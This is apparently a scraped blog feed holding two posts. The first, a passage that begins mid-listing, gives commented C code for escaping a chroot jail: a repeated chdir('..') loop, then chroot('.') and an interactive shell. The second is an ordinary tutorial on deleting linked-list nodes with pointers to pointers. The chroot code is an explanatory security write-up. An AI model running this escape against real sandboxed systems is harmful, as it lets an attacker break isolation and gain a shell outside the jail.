<tr><td align="right" bgcolor="#bfbfbf">069 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** Next we chroot() to the temporary directory </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">070 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">071 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if (chroot(TEMP_DIR)<0) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">072 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR, </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">073 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> strerror(errno)); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">074 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">075 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">076 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">077 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #ifdef NEED_FCHDIR </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">078 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">079 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** Partially break out of the chroot by doing an fchdir() </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">080 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">081 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** This only partially breaks out of the chroot() since whilst </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">082 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** our current working directory is outside of the chroot() jail, </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">083 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** our root directory is still within it. Thus anything which refers </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">084 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** to "/" will refer to files under the chroot() point. </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">085 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">086 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** Note: Only required if chroot() changes the calling program's </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">087 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** working directory to the directory given to chroot(). </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">088 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">089 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">090 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if (fchdir(dir_fd)<0) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">091 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Failed to fchdir - %s\n", </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">092 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> strerror(errno)); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">093 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">094 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">095 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> close(dir_fd); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">096 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #endif </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">097 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">098 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">099 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** Completely break out of the chroot by recursing up the directory </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">100 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** tree and doing a chroot to the current working directory (which will </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">101 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** be the real "/" at that point). We just do a chdir("..") lots of </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">102 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** times (1024 times for luck :). If we hit the real root directory before </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">103 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** we have finished the loop below it doesn't matter as .. in the root </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">104 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** directory is the same as . in the root. </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">105 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">106 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** We do the final break out by doing a chroot(".") which sets the root </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">107 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** directory to the current working directory - at this point the real </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">108 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** root directory. </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">109 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">110 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> for(x=0;x<1024;x++) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">111 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> chdir(".."); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">112 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">113 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> chroot("."); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">114 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">115 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">116 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** We're finally out - so exec a shell in interactive mode </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">117 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">118 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if (execl("/bin/sh","-i",NULL)<0) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">119 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Failed to exec - %s\n",strerror(errno)); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">120 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">121 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">122 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } <br /></code></span></td></tr>
</tbody></table>
</div>
<br />
<div style="text-align: -webkit-auto;">
</div>
<div style="text-align: -webkit-auto;">
<br /></div>
<div style="text-align: -webkit-auto;">
<br /></div>
<div style="text-align: -webkit-auto;">
<br /></div>
<div style="text-align: -webkit-auto;">
<br /></div>
<div style="text-align: -webkit-auto;">
<span style="font-size: xx-small;">References:<a href="http://www.bpfh.net/" target="_blank">Click Here</a></span></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-51562203964946098812012-10-14T21:50:00.001-07:002012-10-14T21:56:56.004-07:00Using Pointers to Pointers In C<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;">Lets try to understand the importance of pointers to pointers by the help of an example.</span></span><span style="font-family: Arial, Helvetica, sans-serif; text-align: -webkit-auto;">Suppose we're trying to write some code to delete a given integer from a list. The straightforward solution looks like this:</span><br />
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> /* delete node containing i from list pointed to by lp */
struct list *lp, *prevlp;
for(lp = list; lp != NULL; lp = lp->next)
{
if(lp->item == i)
{
if(lp == list)
list = lp->next;
else prevlp->next = lp->next;
break;
}
prevlp = lp;
}
}
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">This code works, but it has two blemishes. One is that it has to use an extra variable to keep track of the node one behind the one it's looking at, and the other is that it has to use an extra test to special-case the situation in which the node being deleted is at the head of the list. Both of these problems arise because the deletion of a node from the list involves modifying the previous pointer to point to the next node (that is, the node before the deleted node to point to the one following). But, depending on whether the node being deleted is the first node in the list or not, the pointer that needs modifying is either the pointer that points to the head of the list, or the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer in the previous node.</span></span><br />
<div style="text-align: -webkit-auto;">
</div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">To illustrate this, suppose that we have the list (1, 2, 3) and we're trying to delete the element 1. After we've found the element 1, <tt>lp</tt> points to its node, which just happens to be the same node that the main <tt>list</tt> pointer points to, as illustrated in (a) below: </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1adc5FoofSlY1T9h8H1ClGqybQgc0hfbGA0KSl2jGYwnTj2mh9npKlRT2Iri62dGv-o4iV_0GS2p24mjDZTKKqKnBMrkjYB5aSk8KJrOxSzq9huEkWEOrL0q4ZzE3h0Gs6CroUtJsCAFA/s1600/fig22.4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1adc5FoofSlY1T9h8H1ClGqybQgc0hfbGA0KSl2jGYwnTj2mh9npKlRT2Iri62dGv-o4iV_0GS2p24mjDZTKKqKnBMrkjYB5aSk8KJrOxSzq9huEkWEOrL0q4ZzE3h0Gs6CroUtJsCAFA/s1600/fig22.4.gif" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<center>
<span style="font-family: Arial, Helvetica, sans-serif;"></span></center>
<span style="font-family: Arial, Helvetica, sans-serif;"><br style="text-align: -webkit-auto;" /><span style="text-align: -webkit-auto;">To remove element 1 from the list, then, we must adjust the main </span><tt style="text-align: -webkit-auto;">list</tt><span style="text-align: -webkit-auto;"> pointer so that it points to 2's node, the new head of the list (as shown in (b)). If we were trying to delete node 2, on the other hand (as illustrated in (c) above), we'd have to adjust node 1's </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer to point to 3. The </span><tt style="text-align: -webkit-auto;">prevlp</tt><span style="text-align: -webkit-auto;"> pointer keeps track of the previous node we were looking at, since (at other than the first node in the list) that's the node whose </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer will need adjusting. (Notice that if we were to delete node 3, we would copy its </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer over to 2, but since 3's </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer is the null pointer, copying it to node 2 would make node 2 the end of the list, as desired.)</span></span><br />
<div style="text-align: -webkit-auto;">
</div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">We can write another version of the list-deletion code, which is (in some ways, at least) much cleaner, by using a <em>pointer to a pointer</em> to a <tt>struct list</tt>. This pointer will point at the pointer which points at the node we're looking at; it will either point at the head pointer or at the <tt>next</tt> pointer of the node we looked at last time. Since this pointer points at the pointer that points at the node we're looking at (got that?), it points at the pointer which we need to modify if the node we're looking at is the node we're deleting. Let's see how the code looks:</span></div>
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> struct list **lpp;
for(lpp = &list; *lpp != NULL; lpp = &(*lpp)->next)
{
if((*lpp)->item == i)
{
*lpp = (*lpp)->next;
break;
}
}
}
</span></pre>
<span style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;">That single line</span></span><br />
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> *lpp = (*lpp)->next;
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">updates the correct pointer, to splice the node it refers to out of the list, regardless of whether the pointer being updated is the head pointer or one of the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointers. (Of course, the payoff is not absolute, because the use of a pointer to a pointer to a </span><tt style="text-align: -webkit-auto;">struct list</tt><span style="text-align: -webkit-auto;"> leads to an algorithm which might not be nearly as obvious at first glance.)</span></span><br />
<div style="text-align: -webkit-auto;">
</div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">To illustrate the use of the pointer-to-pointer <tt>lpp</tt> graphically, here are two more figures illustrating the situation just before deleting node 1 (on the left) or node 2 (on the right). </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRY9X5Z-nlZ9yoxvr3iiigWAXEPVGJ2d5oEEdyNyyBRwfFbx2nNfgZ-YJSFsoEy-h3-w5VjUtmR52soH5ZbBL8lAHjtqMzoYBhpqjMaY2zdskOSLbvaXuZmNugMyTx_TebrxOTK50i0vVw/s1600/fig22.5.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRY9X5Z-nlZ9yoxvr3iiigWAXEPVGJ2d5oEEdyNyyBRwfFbx2nNfgZ-YJSFsoEy-h3-w5VjUtmR52soH5ZbBL8lAHjtqMzoYBhpqjMaY2zdskOSLbvaXuZmNugMyTx_TebrxOTK50i0vVw/s1600/fig22.5.gif" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<center>
<span style="font-family: Arial, Helvetica, sans-serif;"></span></center>
<span style="font-family: Arial, Helvetica, sans-serif;"><br style="text-align: -webkit-auto;" /><span style="text-align: -webkit-auto;">In both cases, </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;"> points at a </span><tt style="text-align: -webkit-auto;">struct node</tt><span style="text-align: -webkit-auto;"> pointer which points at the node to be deleted. In both cases, the pointer pointed to by </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;"> (that is, the pointer </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;">) is the pointer that needs to be updated. In both cases, the new pointer (the pointer that </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;"> is to be updated </span><em style="text-align: -webkit-auto;">to</em><span style="text-align: -webkit-auto;">) is the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer of the node being deleted, which is always </span><tt style="text-align: -webkit-auto;">(*lpp)->next</tt><span style="text-align: -webkit-auto;">.</span></span><br />
<div style="text-align: -webkit-auto;">
</div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">One other aspect of the code deserves mention. The expression</span></div>
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> (*lpp)->next
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">describes the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer of the </span><tt style="text-align: -webkit-auto;">struct node</tt><span style="text-align: -webkit-auto;"> which is pointed to by </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;">, that is, which is pointed to by the pointer which is pointed to by </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;">. The expression</span></span><br />
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> lpp = &(*lpp)->next
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">sets </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;"> to point to the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> field of the </span><tt style="text-align: -webkit-auto;">struct list</tt><span style="text-align: -webkit-auto;"> pointed to by </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;">. In both cases, the parentheses around </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;"> are needed because the precedence of </span><tt style="text-align: -webkit-auto;">*</tt><span style="text-align: -webkit-auto;"> is lower than </span><tt style="text-align: -webkit-auto;">-></tt><span style="text-align: -webkit-auto;">.</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;"><br /></span></span></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0